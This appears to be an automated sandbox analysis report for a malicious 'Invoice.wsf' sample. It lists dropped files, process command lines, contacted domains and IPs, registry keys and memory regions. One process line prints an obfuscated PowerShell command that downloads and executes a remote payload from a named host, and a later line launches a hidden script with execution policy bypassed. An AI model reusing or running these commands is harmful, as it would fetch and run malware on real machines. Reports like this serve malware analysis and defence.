Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Invoice.wsf
|
Unicode text, UTF-8 text, with very long lines (7092), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.bat
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1
|
ASCII text, with very long lines (65532), with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.vbs
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\jxs[1].txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aazunhzh.wbw.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oigrrk00.nff.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wnyh40io.11q.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ziurkhoa.qnq.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Invoice.wsf"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
|
|
|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.vbs"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.bat" "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1'"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://afclifescience-tiurma.com/jxs.txt
|
192.185.141.13
|
|
|
|
kareemovic11.duckdns.org
|
|
||
|
https://afclifescience-tiurma.com/rkem.jpg
|
192.185.141.13
|
|
|
|
https://afclifescience-tiurma.com/
|
unknown
|
|
|
|
https://afclifescience-tiurma.com
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
https://afclifescience-tiurma.com/jxs.txtLMEMX
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://afclifescience-tiurma.com/jxs.txtkR
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://afclifescience-tiurma.com/jxs.txtsC:
|
unknown
|
||
|
https://afclifescience-tiurma.LWD
|
unknown
|
||
|
https://afclifescience-tiurma.com/jxs.txtWRx
|
unknown
|
||
|
https://afclifescience-tiurma.com/jxs.txtc
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://afclifescience-tiurma.com/rkem.jpgX
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://afclifescience-tiurma.com
|
unknown
|
||
|
https://oneget.org
|
unknown
|
There are 17 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
afclifescience-tiurma.com
|
192.185.141.13
|
|
|
|
kareemovic11.duckdns.org
|
104.243.37.177
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
104.243.37.177
|
kareemovic11.duckdns.org
|
United States
|
|
|
|
192.185.141.13
|
afclifescience-tiurma.com
|
United States
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
2389D3D0000
|
trusted library section
|
page read and write
|
|
|
|
2E81000
|
trusted library allocation
|
page read and write
|
|
|
|
238853A5000
|
trusted library allocation
|
page read and write
|
|
|
|
23886B23000
|
trusted library allocation
|
page read and write
|
|
|
|
238872B1000
|
trusted library allocation
|
page read and write
|
|
|
|
402000
|
remote allocation
|
page execute and read and write
|
|
|
|
21EA6199000
|
heap
|
page read and write
|
||
|
238831A8000
|
heap
|
page read and write
|
||
|
3E81000
|
trusted library allocation
|
page read and write
|
||
|
21E8D860000
|
trusted library allocation
|
page read and write
|
||
|
1450000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
|
1ABE03F0000
|
heap
|
page read and write
|
||
|
7FFD9B6E6000
|
trusted library allocation
|
page execute and read and write
|
||
|
21E8D905000
|
heap
|
page read and write
|
||
|
238856E8000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B716000
|
trusted library allocation
|
page execute and read and write
|
||
|
238856ED000
|
trusted library allocation
|
page read and write
|
||
|
238952B9000
|
trusted library allocation
|
page read and write
|
||
|
2389574A000
|
trusted library allocation
|
page read and write
|
||
|
21EA6030000
|
heap
|
page execute and read and write
|
||
|
21EA617E000
|
heap
|
page read and write
|
||
|
21E8BE94000
|
heap
|
page read and write
|
||
|
2E5C000
|
stack
|
page read and write
|
||
|
5D756FF000
|
stack
|
page read and write
|
||
|
1577000
|
heap
|
page read and write
|
||
|
21E8BEE0000
|
heap
|
page read and write
|
||
|
21E8D820000
|
trusted library allocation
|
page read and write
|
||
|
209306CE000
|
heap
|
page read and write
|
||
|
5874000
|
trusted library allocation
|
page read and write
|
||
|
238872DC000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8A0000
|
trusted library allocation
|
page read and write
|
||
|
7FD20000
|
trusted library allocation
|
page execute and read and write
|
||
|
6F4E000
|
stack
|
page read and write
|
||
|
23884F84000
|
heap
|
page read and write
|
||
|
26D8AFE000
|
stack
|
page read and write
|
||
|
5DDE000
|
stack
|
page read and write
|
||
|
21E8BF70000
|
heap
|
page read and write
|
||
|
7FFD9B634000
|
trusted library allocation
|
page read and write
|
||
|
20930686000
|
heap
|
page read and write
|
||
|
8F96CFB000
|
stack
|
page read and write
|
||
|
7FFD9B8A0000
|
trusted library allocation
|
page read and write
|
||
|
5D74EFD000
|
stack
|
page read and write
|
||
|
52E0000
|
heap
|
page execute and read and write
|
||
|
5870000
|
trusted library allocation
|
page read and write
|
||
|
21EA5DAC000
|
heap
|
page read and write
|
||
|
1560000
|
trusted library allocation
|
page read and write
|
||
|
5891000
|
trusted library allocation
|
page read and write
|
||
|
6A0E000
|
stack
|
page read and write
|
||
|
1ABE0245000
|
heap
|
page read and write
|
||
|
21E9D911000
|
trusted library allocation
|
page read and write
|
||
|
26D81EF000
|
stack
|
page read and write
|
||
|
21E8DEEF000
|
trusted library allocation
|
page read and write
|
||
|
26D84FE000
|
stack
|
page read and write
|
||
|
59F0000
|
trusted library allocation
|
page read and write
|
||
|
26D81A3000
|
stack
|
page read and write
|
||
|
7FFD9B8E0000
|
trusted library allocation
|
page read and write
|
||
|
21E8DD71000
|
trusted library allocation
|
page read and write
|
||
|
5471000
|
heap
|
page read and write
|
||
|
1570000
|
heap
|
page read and write
|
||
|
6C4D000
|
stack
|
page read and write
|
||
|
21E8E4C5000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
2092EA40000
|
heap
|
page read and write
|
||
|
7FFD9B7EA000
|
trusted library allocation
|
page read and write
|
||
|
21E8BF46000
|
heap
|
page read and write
|
||
|
5869000
|
stack
|
page read and write
|
||
|
57193EE000
|
stack
|
page read and write
|
||
|
7FFD9B8E0000
|
trusted library allocation
|
page read and write
|
||
|
5D74DFE000
|
stack
|
page read and write
|
||
|
238959CA000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7E1000
|
trusted library allocation
|
page read and write
|
||
|
238872EA000
|
trusted library allocation
|
page read and write
|
||
|
209306D1000
|
heap
|
page read and write
|
||
|
2092EA5D000
|
heap
|
page read and write
|
||
|
5B90000
|
heap
|
page read and write
|
||
|
1200000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page read and write
|
||
|
2389D480000
|
heap
|
page read and write
|
||
|
7FFD9B840000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
|
21EA61B1000
|
heap
|
page read and write
|
||
|
6CCF000
|
stack
|
page read and write
|
||
|
5719BFE000
|
stack
|
page read and write
|
||
|
21E9D980000
|
trusted library allocation
|
page read and write
|
||
|
21E9DBFA000
|
trusted library allocation
|
page read and write
|
||
|
F66000
|
heap
|
page read and write
|
||
|
2388516A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B820000
|
trusted library allocation
|
page read and write
|
||
|
23895101000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B890000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B860000
|
trusted library allocation
|
page read and write
|
||
|
1182000
|
heap
|
page read and write
|
||
|
7FFD9B7E2000
|
trusted library allocation
|
page read and write
|
||
|
2389D192000
|
heap
|
page read and write
|
||
|
2092EA5D000
|
heap
|
page read and write
|
||
|
26D964E000
|
stack
|
page read and write
|
||
|
2389D102000
|
heap
|
page read and write
|
||
|
3EA9000
|
trusted library allocation
|
page read and write
|
||
|
571967F000
|
stack
|
page read and write
|
||
|
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
|
238831A4000
|
heap
|
page read and write
|
||
|
8F966FF000
|
stack
|
page read and write
|
||
|
21EA5DAA000
|
heap
|
page read and write
|
||
|
20930800000
|
heap
|
page read and write
|
||
|
571997E000
|
stack
|
page read and write
|
||
|
1ABE0310000
|
heap
|
page read and write
|
||
|
20930671000
|
heap
|
page read and write
|
||
|
21EA61BF000
|
heap
|
page read and write
|
||
|
7FFD9B890000
|
trusted library allocation
|
page read and write
|
||
|
F10000
|
heap
|
page read and write
|
||
|
571977E000
|
stack
|
page read and write
|
||
|
21E8D900000
|
heap
|
page read and write
|
||
|
21EA5D6C000
|
heap
|
page read and write
|
||
|
8F964FE000
|
stack
|
page read and write
|
||
|
110E000
|
heap
|
page read and write
|
||
|
23883140000
|
heap
|
page read and write
|
||
|
10B0000
|
heap
|
page read and write
|
||
|
23885723000
|
trusted library allocation
|
page read and write
|
||
|
1ABE05C5000
|
heap
|
page read and write
|
||
|
21E8BD70000
|
heap
|
page read and write
|
||
|
23887127000
|
trusted library allocation
|
page read and write
|
||
|
21E8DD65000
|
trusted library allocation
|
page read and write
|
||
|
23886123000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7D0000
|
trusted library allocation
|
page read and write
|
||
|
2092EA47000
|
heap
|
page read and write
|
||
|
118B000
|
heap
|
page read and write
|
||
|
2092E9A8000
|
heap
|
page read and write
|
||
|
209306E3000
|
heap
|
page read and write
|
||
|
23883160000
|
heap
|
page read and write
|
||
|
21EA5919000
|
heap
|
page read and write
|
||
|
2093067C000
|
heap
|
page read and write
|
||
|
5466000
|
heap
|
page read and write
|
||
|
20930687000
|
heap
|
page read and write
|
||
|
209306E5000
|
heap
|
page read and write
|
||
|
10C7000
|
heap
|
page read and write
|
||
|
7FFD9B7C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
21E8DEF5000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B800000
|
trusted library allocation
|
page read and write
|
||
|
23883168000
|
heap
|
page read and write
|
||
|
3EE6000
|
trusted library allocation
|
page read and write
|
||
|
1ABE0210000
|
heap
|
page read and write
|
||
|
209307F0000
|
remote allocation
|
page read and write
|
||
|
21E8F05D000
|
trusted library allocation
|
page read and write
|
||
|
5D758FB000
|
stack
|
page read and write
|
||
|
654E000
|
stack
|
page read and write
|
||
|
7FFD9B860000
|
trusted library allocation
|
page read and write
|
||
|
1090000
|
heap
|
page read and write
|
||
|
2388319C000
|
heap
|
page read and write
|
||
|
5D751FE000
|
stack
|
page read and write
|
||
|
52C0000
|
trusted library allocation
|
page read and write
|
||
|
21E9DE39000
|
trusted library allocation
|
page read and write
|
||
|
1ABE02B0000
|
heap
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page read and write
|
||
|
115D000
|
heap
|
page read and write
|
||
|
7FFD9B7A2000
|
trusted library allocation
|
page read and write
|
||
|
11A0000
|
heap
|
page read and write
|
||
|
21E8BE77000
|
heap
|
page read and write
|
||
|
2389D13C000
|
heap
|
page read and write
|
||
|
21E8F300000
|
trusted library allocation
|
page read and write
|
||
|
238954D3000
|
trusted library allocation
|
page read and write
|
||
|
1237000
|
heap
|
page read and write
|
||
|
2092E8A0000
|
heap
|
page read and write
|
||
|
71CE000
|
stack
|
page read and write
|
||
|
209306CE000
|
heap
|
page read and write
|
||
|
21E8BEA0000
|
heap
|
page read and write
|
||
|
7FFD9B7A0000
|
trusted library allocation
|
page read and write
|
||
|
5719AF8000
|
stack
|
page read and write
|
||
|
2389D2B0000
|
heap
|
page read and write
|
||
|
2092E8C0000
|
heap
|
page read and write
|
||
|
11F4000
|
trusted library allocation
|
page read and write
|
||
|
21E8BE70000
|
heap
|
page read and write
|
||
|
7FFD9B8D0000
|
trusted library allocation
|
page read and write
|
||
|
5365000
|
heap
|
page read and write
|
||
|
5719A78000
|
stack
|
page read and write
|
||
|
21EA61AF000
|
heap
|
page read and write
|
||
|
21E8DD69000
|
trusted library allocation
|
page read and write
|
||
|
209306D1000
|
heap
|
page read and write
|
||
|
1ABE22A0000
|
heap
|
page read and write
|
||
|
5896000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
|
2092E9DD000
|
heap
|
page read and write
|
||
|
5B80000
|
heap
|
page read and write
|
||
|
1460000
|
trusted library allocation
|
page execute and read and write
|
||
|
53F0000
|
heap
|
page read and write
|
||
|
5719B79000
|
stack
|
page read and write
|
||
|
2092E8D0000
|
heap
|
page read and write
|
||
|
562E000
|
stack
|
page read and write
|
||
|
21E8DEDA000
|
trusted library allocation
|
page read and write
|
||
|
21E8F07D000
|
trusted library allocation
|
page read and write
|
||
|
2092EA81000
|
heap
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
|
57198FE000
|
stack
|
page read and write
|
||
|
26D8BFE000
|
stack
|
page read and write
|
||
|
576A000
|
stack
|
page read and write
|
||
|
21E8ED7B000
|
trusted library allocation
|
page read and write
|
||
|
26D87FE000
|
stack
|
page read and write
|
||
|
7FFD9B7D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
209307F0000
|
remote allocation
|
page read and write
|
||
|
209306E3000
|
heap
|
page read and write
|
||
|
2092EA54000
|
heap
|
page read and write
|
||
|
238850E0000
|
heap
|
page execute and read and write
|
||
|
20930681000
|
heap
|
page read and write
|
||
|
21E8DD30000
|
trusted library allocation
|
page read and write
|
||
|
1470000
|
heap
|
page execute and read and write
|
||
|
26D8A7E000
|
stack
|
page read and write
|
||
|
21E9DB69000
|
trusted library allocation
|
page read and write
|
||
|
21E8BE92000
|
heap
|
page read and write
|
||
|
2389D2D0000
|
heap
|
page read and write
|
||
|
7FFD9B750000
|
trusted library allocation
|
page execute and read and write
|
||
|
20930670000
|
heap
|
page read and write
|
||
|
2092EA81000
|
heap
|
page read and write
|
||
|
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
|
5475000
|
heap
|
page read and write
|
||
|
5D755FE000
|
stack
|
page read and write
|
||
|
23885717000
|
trusted library allocation
|
page read and write
|
||
|
21EA61BA000
|
heap
|
page read and write
|
||
|
5CD3000
|
heap
|
page read and write
|
||
|
21E9D920000
|
trusted library allocation
|
page read and write
|
||
|
133D000
|
stack
|
page read and write
|
||
|
26D86FE000
|
stack
|
page read and write
|
||
|
2389D131000
|
heap
|
page read and write
|
||
|
26D974D000
|
stack
|
page read and write
|
||
|
8F967FE000
|
stack
|
page read and write
|
||
|
1230000
|
heap
|
page read and write
|
||
|
7FFD9B8C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B602000
|
trusted library allocation
|
page read and write
|
||
|
1212000
|
trusted library allocation
|
page read and write
|
||
|
21E8D8D0000
|
heap
|
page execute and read and write
|
||
|
2389D490000
|
heap
|
page read and write
|
||
|
21E8BE50000
|
heap
|
page read and write
|
||
|
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
|
57196FF000
|
stack
|
page read and write
|
||
|
58E0000
|
heap
|
page read and write
|
||
|
114A000
|
heap
|
page read and write
|
||
|
26D897C000
|
stack
|
page read and write
|
||
|
209306CB000
|
heap
|
page read and write
|
||
|
2389D200000
|
heap
|
page execute and read and write
|
||
|
21EA6140000
|
heap
|
page read and write
|
||
|
1216000
|
trusted library allocation
|
page execute and read and write
|
||
|
26D8C7B000
|
stack
|
page read and write
|
||
|
7FFD9B6EC000
|
trusted library allocation
|
page execute and read and write
|
||
|
23884B20000
|
trusted library allocation
|
page read and write
|
||
|
2F2D000
|
trusted library allocation
|
page read and write
|
||
|
26D89F7000
|
stack
|
page read and write
|
||
|
2092EA40000
|
heap
|
page read and write
|
||
|
5E1E000
|
stack
|
page read and write
|
||
|
5A54000
|
trusted library allocation
|
page read and write
|
||
|
21E9DE26000
|
trusted library allocation
|
page read and write
|
||
|
5882000
|
trusted library allocation
|
page read and write
|
||
|
587E000
|
trusted library allocation
|
page read and write
|
||
|
21E8F0A4000
|
trusted library allocation
|
page read and write
|
||
|
21EA619E000
|
heap
|
page read and write
|
||
|
10CA000
|
heap
|
page read and write
|
||
|
7FFD9B840000
|
trusted library allocation
|
page read and write
|
||
|
11F3000
|
trusted library allocation
|
page execute and read and write
|
||
|
209306D1000
|
heap
|
page read and write
|
||
|
7FFD9B604000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B815000
|
trusted library allocation
|
page read and write
|
||
|
122B000
|
trusted library allocation
|
page execute and read and write
|
||
|
21EA5DD7000
|
heap
|
page read and write
|
||
|
588E000
|
trusted library allocation
|
page read and write
|
||
|
26D877E000
|
stack
|
page read and write
|
||
|
26D85FF000
|
stack
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
23884E80000
|
heap
|
page readonly
|
||
|
238850F1000
|
trusted library allocation
|
page read and write
|
||
|
571987E000
|
stack
|
page read and write
|
||
|
571A74E000
|
stack
|
page read and write
|
||
|
5BB0000
|
heap
|
page read and write
|
||
|
57193A2000
|
stack
|
page read and write
|
||
|
209306E3000
|
heap
|
page read and write
|
||
|
57199F9000
|
stack
|
page read and write
|
||
|
7FFD9B6B0000
|
trusted library allocation
|
page read and write
|
||
|
2092EA1C000
|
heap
|
page read and write
|
||
|
7FFD9B6B6000
|
trusted library allocation
|
page read and write
|
||
|
2092E970000
|
heap
|
page read and write
|
||
|
7FFD9B720000
|
trusted library allocation
|
page execute and read and write
|
||
|
2389D236000
|
heap
|
page execute and read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page read and write
|
||
|
2092EA21000
|
heap
|
page read and write
|
||
|
20930686000
|
heap
|
page read and write
|
||
|
209306E3000
|
heap
|
page read and write
|
||
|
21E8BEDC000
|
heap
|
page read and write
|
||
|
209307F0000
|
remote allocation
|
page read and write
|
||
|
5A40000
|
heap
|
page read and write
|
||
|
2E70000
|
heap
|
page read and write
|
||
|
658E000
|
stack
|
page read and write
|
||
|
F60000
|
heap
|
page read and write
|
||
|
5D750FB000
|
stack
|
page read and write
|
||
|
6C8E000
|
stack
|
page read and write
|
||
|
1ABE0410000
|
heap
|
page read and write
|
||
|
2092EA4D000
|
heap
|
page read and write
|
||
|
7FFD9B7F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B8D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8B0000
|
trusted library allocation
|
page read and write
|
||
|
F5C000
|
stack
|
page read and write
|
||
|
571A84B000
|
stack
|
page read and write
|
||
|
7FFD9B603000
|
trusted library allocation
|
page execute and read and write
|
||
|
23884F00000
|
trusted library allocation
|
page read and write
|
||
|
4F7D000
|
stack
|
page read and write
|
||
|
2388712C000
|
trusted library allocation
|
page read and write
|
||
|
5D752FE000
|
stack
|
page read and write
|
||
|
7FFD9B600000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B6F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
20930808000
|
heap
|
page read and write
|
||
|
7FFD9B850000
|
trusted library allocation
|
page read and write
|
||
|
5719D7B000
|
stack
|
page read and write
|
||
|
21E8BE8F000
|
heap
|
page read and write
|
||
|
1ABE1F50000
|
heap
|
page read and write
|
||
|
2E1E000
|
stack
|
page read and write
|
||
|
2389D4B1000
|
heap
|
page read and write
|
||
|
21EA5E01000
|
heap
|
page read and write
|
||
|
2092EA81000
|
heap
|
page read and write
|
||
|
5D74CF5000
|
stack
|
page read and write
|
||
|
238950F1000
|
trusted library allocation
|
page read and write
|
||
|
698E000
|
stack
|
page read and write
|
||
|
8F962F9000
|
stack
|
page read and write
|
||
|
23885315000
|
trusted library allocation
|
page read and write
|
||
|
21EA61A2000
|
heap
|
page read and write
|
||
|
11F0000
|
trusted library allocation
|
page read and write
|
||
|
23884B30000
|
heap
|
page read and write
|
||
|
5393000
|
heap
|
page read and write
|
||
|
21E8F44A000
|
trusted library allocation
|
page read and write
|
||
|
209306E3000
|
heap
|
page read and write
|
||
|
209306CF000
|
heap
|
page read and write
|
||
|
2093080C000
|
heap
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
|
57197FD000
|
stack
|
page read and write
|
||
|
21E8D7A0000
|
trusted library allocation
|
page read and write
|
||
|
1227000
|
trusted library allocation
|
page execute and read and write
|
||
|
10BC000
|
heap
|
page read and write
|
||
|
2389542C000
|
trusted library allocation
|
page read and write
|
||
|
58D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
6B0E000
|
stack
|
page read and write
|
||
|
21E8F5DC000
|
trusted library allocation
|
page read and write
|
||
|
21EA5EB0000
|
heap
|
page execute and read and write
|
||
|
71F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
26D857E000
|
stack
|
page read and write
|
||
|
8F963FF000
|
stack
|
page read and write
|
||
|
20930686000
|
heap
|
page read and write
|
||
|
21E8DB31000
|
trusted library allocation
|
page read and write
|
||
|
209306D1000
|
heap
|
page read and write
|
||
|
238830D0000
|
heap
|
page read and write
|
||
|
7FFD9B6E6000
|
trusted library allocation
|
page read and write
|
||
|
26D847E000
|
stack
|
page read and write
|
||
|
1ABE0274000
|
heap
|
page read and write
|
||
|
21E8F35B000
|
trusted library allocation
|
page read and write
|
||
|
21E8F081000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B633000
|
trusted library allocation
|
page execute and read and write
|
||
|
2389D0F0000
|
heap
|
page read and write
|
||
|
1178000
|
heap
|
page read and write
|
||
|
7FFD9B850000
|
trusted library allocation
|
page read and write
|
||
|
21EA5E2A000
|
heap
|
page read and write
|
||
|
21E8BF50000
|
heap
|
page read and write
|
||
|
21E8BEB2000
|
heap
|
page read and write
|
||
|
6E4E000
|
stack
|
page read and write
|
||
|
23884F70000
|
heap
|
page read and write
|
||
|
26D867D000
|
stack
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
107E000
|
stack
|
page read and write
|
||
|
2389584A000
|
trusted library allocation
|
page read and write
|
||
|
21E9DF87000
|
trusted library allocation
|
page read and write
|
||
|
2389573B000
|
trusted library allocation
|
page read and write
|
||
|
5D754FE000
|
stack
|
page read and write
|
||
|
8F969FE000
|
stack
|
page read and write
|
||
|
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
|
238831A2000
|
heap
|
page read and write
|
||
|
209306D1000
|
heap
|
page read and write
|
||
|
70CC000
|
stack
|
page read and write
|
||
|
7FFD9B817000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
|
209306CB000
|
heap
|
page read and write
|
||
|
21E8DD25000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B61B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B870000
|
trusted library allocation
|
page read and write
|
||
|
120D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B60D000
|
trusted library allocation
|
page execute and read and write
|
||
|
535E000
|
heap
|
page read and write
|
||
|
7FFD9B8B0000
|
trusted library allocation
|
page read and write
|
||
|
5381000
|
heap
|
page read and write
|
||
|
21E9DC09000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B810000
|
trusted library allocation
|
page read and write
|
||
|
53DC000
|
heap
|
page read and write
|
||
|
7FFD9B640000
|
trusted library allocation
|
page read and write
|
||
|
8F96AFE000
|
stack
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B812000
|
trusted library allocation
|
page read and write
|
||
|
59E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7BA000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B6BC000
|
trusted library allocation
|
page execute and read and write
|
||
|
21E8DD41000
|
trusted library allocation
|
page read and write
|
||
|
11FD000
|
trusted library allocation
|
page execute and read and write
|
||
|
21E8BFB0000
|
heap
|
page read and write
|
||
|
21E8DD3E000
|
trusted library allocation
|
page read and write
|
||
|
2092EA5A000
|
heap
|
page read and write
|
||
|
209306D1000
|
heap
|
page read and write
|
||
|
21E8D7F0000
|
trusted library allocation
|
page read and write
|
||
|
674E000
|
stack
|
page read and write
|
||
|
21E8BFF0000
|
heap
|
page read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
21E8D911000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B880000
|
trusted library allocation
|
page read and write
|
||
|
5A07000
|
trusted library allocation
|
page read and write
|
||
|
209306B4000
|
heap
|
page read and write
|
||
|
238831E3000
|
heap
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page read and write
|
||
|
587B000
|
trusted library allocation
|
page read and write
|
||
|
69CF000
|
stack
|
page read and write
|
||
|
209306CB000
|
heap
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
143F000
|
stack
|
page read and write
|
||
|
